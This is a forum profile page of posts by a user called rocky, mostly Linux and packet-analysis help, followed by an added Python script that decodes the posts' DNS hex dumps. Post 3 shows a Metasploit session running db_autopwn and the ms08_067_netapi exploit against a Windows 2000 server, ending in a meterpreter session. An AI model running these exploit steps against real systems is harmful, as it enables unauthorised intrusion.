Everything posted by rocky

  1. Try the following command:

         iwconfig [interface] mode monitor

     This command will put your wireless interface into RFMON mode. Please read:
  2. I recommend using VMware Server - which is free to download and install - for running Linux. This way, during the course of your learning, any mistakes you may make will only affect the virtual machine. You may find that in the future you will want to use Linux as your main operating system, but in the meantime, if your goal is simply to learn Linux while still retaining the functionality of Windows, give the virtualization method a shot. VMware is fairly straightforward to install and to use as well. An added bonus will be learning two new skills -- always a plus!
  3. For finding vulnerabilities I would check out Nessus or SAINT. What's cool about using Nessus is that you can load an exported Nessus scan right into Metasploit, making the process much more automated.

     autopwn using an exported NBE Nessus scan file against a Windows 2000 Server pansy box.

         msf > db_create
         [*] Creating a new database instance...
         [*] Successfully connected to the database
         [*] File: /root/.msf3/sqlite3.db
         msf > db_import_nessus_nbe /root/nessus1026.nbe
         msf > db_services
         [*] Time: 2009-11-26 15:33:20 -0800 Service: host= port=139 proto=tcp state=up name=netbios-ssn
         [snip]
         [*] Time: 2009-11-26 15:33:23 -0800 Service: host= port=135 proto=udp state=up name=epmap
         msf > db_vulns
         [*] Time: 2009-11-26 15:33:20 -0800 Vuln: host= port=139 proto=tcp name=NSS-11011 refs=
         [snip]
         [*] Time: 2009-11-26 15:33:25 -0800 Vuln: host= port=445 proto=tcp name=NSS-11110 refs=CVE-2002-0724,BID-5556,OSVDB-2074
         msf > db_autopwn -p -t -e

     A more manual exploit against a Windows 2000 Server pansy box.

         msf > use exploit/windows/smb/ms08_067_netapi
         msf exploit(ms08_067_netapi) > set RHOST
         RHOST =>
         msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
         PAYLOAD => windows/meterpreter/bind_tcp
         msf exploit(ms08_067_netapi) > set LHOST
         LHOST =>
         msf exploit(ms08_067_netapi) > exploit
         [*] Started bind handler
         [*] Automatically detecting the target...
         [*] Fingerprint: Windows 2000 Service Pack 0 - 4 - lang:English
         [*] Selected Target: Windows 2000 Universal
         [*] Triggering the vulnerability...
         [*] Sending stage (719360 bytes)
         [*] Meterpreter session 1 opened ( ->
         meterpreter >
  4. I believe that this Slackware networking tutorial will answer your question about wpa_supplicant and WPA2:
  5. In fact lspci -k will show the kernel modules.
  6. You need the -v switch for lspci to show you which module is in use.

         lspci -v

     If you use the verbose switch you get more detailed information about each PCI device, but the same devices are displayed regardless of whether the switch is present.
  7. lspci might be the command you're looking for.
  8. Dial Tone, Cool man I can respect that. Try this: First you have to format the hex data you have to the format that text2pcap wants:

         000000 00 0f db cb 06 6a 00 03 93 ed 1d 83 08 00 45 18
         000010 00 47 30 7d 00 00 ff 11 07 5e c0 a8 01 61 c0 a8
         000020 01 01 14 e9 00 35 00 33 96 ce 4c 24 01 00 00 01
         000030 00 00 00 00 00 00 02 39 37 01 31 03 31 36 38 03
         000040 31 39 32 07 69 6e 2d 61 64 64 72 04 61 72 70 61
         000050 00 00 0c 00 01

     Next, use text2pcap on the file you have saved this data into. Try that; it totally worked for me, I was able to open the file in Wireshark and everything.
  9. Hi Dirk Chesnut, Not really knowing much about rkhunter, I actually went and downloaded rkhunter and ran it and it must do some sort of generic profiling which then is compared to the current state of your system, because I got some errors, mostly innocuous ones though. After that it must store information of the last known state, being the last time it was run, into the /var/lib/rkhunter directory in a file called db, which I'm assuming is for database. Now I'm parroting you, however that is what I meant by database in my previous post, a file that contains the profile of your local machine of the last known state which is then compared against the current state when you run rkhunter, which is bound to produce false positives. Good post by the way.
  10. I think his professor is trying to get him to take an IP packet, analyze the data, then deduce what operating system it came from. It's already in hex and only the data portion would produce useful information from an ASCII conversion.

          00 1a 70 fb f7 77 00 13 02 a9 97 97 08 00 45 00
          00 45 c7 98 00 00 80 11 25 f9 c0 a8 01 65 4a dc
          40 2d d6 08 00 35 00 31 d0 9e 1c 86 01 00 00 01
          00 00 00 00 00 00 03 77 77 77 0f 74 68 65 66 65
          64 6f 72 61 6c 6f 75 6e 67 65 03 63 6f 6d 00 00
          01 00 01

      Above is a DNS request from a Windows XP laptop I have to the DNS server of my ISP that I took directly from Wireshark. The TTL is 0x80 or 128, which is a clear indicator that it's a Windows machine. I think in the above case, the hex data that Dial Tone posted, it was just a matter of fingerprinting by determining the TTL.
  11. I've never used rkhunter but it appears to use a database and then does a comparison of the database against the current state of your system. I wouldn't be too worried about the inode number change. You said that you updated your system? That is most likely the culprit.
  12. Here's what I found from analyzing the information:

          000fdbcb066a000393ed1d830800[IP packet]4518 0047307d0000ff[TTL]11[udp]075ec0a80161[source address]c0a80 101[destination address]14e9[source port]0035[destination port]003396ce4c24010000010 00000000000023937013103313638033 1393207696e2d6164647204617270610 00[data]00c0001

      List of TTL by operating system:
  13. Now I'm probably wrong but here's what I got:

          IP packet
          Unix like operating system
          UDP
          source address
          destination address
          source port 5353
          destination port 53/DNS

      Here's what the data portion says:

          ?97?1?168?192?in-addr?arpa??
  14. The opposite: I have text data I want to be hex. Think of it as if in programming, you stored "12345" as a string instead of an integer.

      Cool, so if you have a text file use xxd as a previous poster noted (sorry for being overzealous). But because I'm kind of thick skulled, is this what you're aiming for?

          $ cat file.txt
          This is example text.
          $ xxd file.txt file.out
          $ cat file.out
          0000000: 5468 6973 2069 7320 6578 616d 706c 6520  This is example
          0000010: 7465 7874 2e0a                           text..
  15. Are you trying to save data from Wireshark? If so, use the export function, and if you're just looking to save a frame or less, use the export Selected Packet Bytes in File > Export > Selected Packet Bytes. After you have this saved it will be a binary file, so as a previous poster suggested, use xxd to get a hex dump to standard out or use redirection to save the output of the xxd hex dump into a text file. I think this is what you're asking, if not my apologies. EDIT: Also there is usually a hexdump command, using no flags, on most Linux installs that will give you just hex, no ASCII, which I think is pretty much the same output as od -x <filename>.
  16. Hey man, As a beginning programmer myself I can definitely attest to learning Python. Actually when I was a teenager I had a complex of wanting to learn only hard stuff. I read a lot of philosophy and literature but I was also into computers and tried learning 68k assembler and C and C++. However there were way too many blank spots in my understanding so I just gave up, this was also coupled with my young male ego believing that I could learn anything, even the hard stuff- especially the hard stuff- because I thought I was a pretty smart cookie. Later on after having become a bit more humble and returning to computers after a couple years of not using them, I wanted to try my hand at programming again but this time I didn't want to go straight for the hard stuff so I picked Python, which I'm still learning, but I have to say that when you actually grasp what you're learning and have fun discovering and surmounting new concepts it feels pretty good and it has actually made reading code, admittedly mostly simple stuff, in other languages a little bit clearer.
  17. I think that the problem with Windows lies not with the operating system entirely but rather with how the average person uses a computer, and if those same uninformed users were to use a different operating system, I would venture to bet that many of the same problems/complaints would arise. I hope I'm not being redundant by saying this: most people view computers as a black box that just merely works or if it doesn't it's for some inexplicable reason, which I think largely lies with the GUI metaphor that obfuscates what is going on behind the scenes. But just as in the world outside of computers most people wish to remain ignorant of what is really happening behind the scenes. Not to imply that there aren't Windows users, or Mac OS users, or whatever OS users who aren't wizards and really do know their operating systems inside out. It only happens that Windows is the de facto operating system for the majority of computer users so there are bound to be more users who are passive consumers who use Windows. Also Linux is marketed, if that's even the correct word, strangely to say the least. There is no killer app outside of the operating system, or kernel, which to the average user is null because most users just want their shit to work and they aren't thinking of the OS. I think that most people want what works and they want something that they paid for, especially in a society as driven by consumerism as the one we have. Open source software is a diverse labor of love, also driven by financial gain too, with some wonderful creations by some truly ingenious people; however, unless you're the type of person willing to deal with change and the occasional hiccup you'll probably be pretty bummed on Linux, and again I think it mostly has to do with users rather than entirely with operating systems. Anyway I hope that this post is keeping on topic. I really like this forum.
  18. Hey, My name's Rocky. I don't really post on forums too often however I've really enjoyed reading through this forum and I thought I'd join. I don't know if I'll post much so perhaps even this post is in vain although I'd like to contribute to any threads where I can add something useful. Anyway... peace, Rocky
  19. Hey, I'm new to the forum. I noticed that you, swerve, are using Ubuntu as your host OS. To easily get VMware Server running on Ubuntu use this tutorial. The tutorial advises not to mess around with the rpm; rather, you should go straight for the tar.gz archive instead. Rocky
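
The field-by-field reading of the two hex dumps in posts 8, 10 and 12 above, as an added example that is not part of the original posts: it parses both frames (Ethernet II, IPv4, UDP, DNS question) and reports the TTL alongside the nearest common initial TTL. The function names and the `INITIAL_TTLS` list of common defaults are assumptions of this sketch.

```python
import struct

# Frames copied from the hex dumps quoted in posts 8 and 10 on this page.
POST_8 = bytes.fromhex("""
 00 0f db cb 06 6a 00 03 93 ed 1d 83 08 00 45 18 00 47 30 7d 00 00 ff 11 07 5e
 c0 a8 01 61 c0 a8 01 01 14 e9 00 35 00 33 96 ce 4c 24 01 00 00 01 00 00 00 00
 00 00 02 39 37 01 31 03 31 36 38 03 31 39 32 07 69 6e 2d 61 64 64 72 04 61 72
 70 61 00 00 0c 00 01""")
POST_10 = bytes.fromhex("""
 00 1a 70 fb f7 77 00 13 02 a9 97 97 08 00 45 00 00 45 c7 98 00 00 80 11 25 f9
 c0 a8 01 65 4a dc 40 2d d6 08 00 35 00 31 d0 9e 1c 86 01 00 00 01 00 00 00 00
 00 00 03 77 77 77 0f 74 68 65 66 65 64 6f 72 61 6c 6f 75 6e 67 65 03 63 6f 6d
 00 00 01 00 01""")

# Common default initial TTLs (an assumption of this sketch, not a list from the page).
INITIAL_TTLS = (64, 128, 255)

def read_qname(dns, pos):
    """Decode an uncompressed DNS name starting at pos; return (name, next_pos)."""
    labels = []
    while dns[pos] != 0:
        n = dns[pos]
        if n & 0xC0:  # compression pointer: not expected in a lone question
            raise ValueError("compressed name")
        labels.append(dns[pos + 1:pos + 1 + n].decode("ascii", "replace"))
        pos += 1 + n
    return ".".join(labels), pos + 1

def parse(frame):
    """Parse Ethernet II / IPv4 / UDP / DNS question into a dict of fields."""
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not IPv4")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4  # honour IP options instead of assuming 20 bytes
    if ip[9] != 17:
        raise ValueError("not UDP")
    sport, dport, ulen = struct.unpack("!HHH", ip[ihl:ihl + 6])
    dns = ip[ihl + 8:ihl + ulen]
    qname, pos = read_qname(dns, 12)  # 12-byte DNS header precedes the question
    ttl = ip[8]
    return {
        "ttl": ttl,
        "likely_initial_ttl": min(t for t in INITIAL_TTLS if t >= ttl),
        "src": ".".join(map(str, ip[12:16])),
        "dst": ".".join(map(str, ip[16:20])),
        "sport": sport, "dport": dport,
        "qname": qname,
        "qtype": struct.unpack("!H", dns[pos:pos + 2])[0],
    }

if __name__ == "__main__":
    for name, pkt in (("post 8", POST_8), ("post 10", POST_10)):
        print(name, parse(pkt))
```

An observed TTL only bounds the sender's initial value from below, and an application can set its own TTL, so the result is a hint rather than an identification.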